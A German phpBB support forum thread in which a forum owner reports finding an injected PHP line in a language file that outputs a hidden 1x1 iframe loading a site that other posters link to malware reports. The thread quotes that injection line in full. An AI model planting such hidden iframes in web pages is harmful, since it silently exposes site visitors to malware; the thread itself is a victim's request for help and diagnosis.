"fabujob.com/?click=20466BB" gehackt ?

[kolja]

Nabend Forum

Leider ist mein Besuch, zu mindest für mich kein erfreulicher.

Diese Zeile fand ich ganz unten in meiner lang:pain.php:

Code: Alles auswählen

echo "<iframe src=\"http://fabujob.com/?click=20466BB\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

Das Änderungsdatum der Datei war heute Nacht, da war aber keiner der beiden Passwortinhaber (außer mir) in Netz.
Gefunden habe ich die Zeile auch nur so schnell, weil es einen "header already sent" Fehler gab.

Nur wie kommt die Zeile da rein ?
Und warum macht das einer/eine so stümperhaft ??
Und vor allem was machen wir das, das nicht wieder passiert ???


Vielen Dank für Anteilnahme und Hilfe.

Gruß Kolja

[Metzle]

Hallo,

ich hab das mal vorsorglich in den 2er Bereich geschoben, da solche eine Datei in der 3er Version nicht existiert.

Generell vielleicht noch als Lesestoff: KB:gehackt

[kolja]

Hallo Forum

Danke erstmal für das verschieben in das Richtige Forum.
Ich war gestern etwas in Eile und habe es wohl verpeilt....

Das Forum läuft leider nicht auf der 2.23 version, sonder nur auf 2.22.
Sobald ich Zeit habe werde ich es updaten, nur daert das halt ein bischen...

Ich würde mich aber sehr freuen, wenn sich schon jetzt irgendwer zu meinem Problem äussern könnte.

Grüße Kolja

[Mahony]

Hallo
Die Suche nach fabujob.com ergab folgendes --> http://www.kujie2.com/blogger/warning-t ... puter.html
Dort ist auch die Rede von maislex.com. Also flugs nach maislex.com gesucht und folgendes gefunden --> http://badwarebusters.org/main/itemview/4876 und http://static-safeweb.norton.com/report ... aislex.net

Das bedeutet wohl, dass du dir einen Virus (oder Malware) eingefangen hast. Die Vorgehensweise zum entfernen steht im zweiten Link.


Grüße: Mahony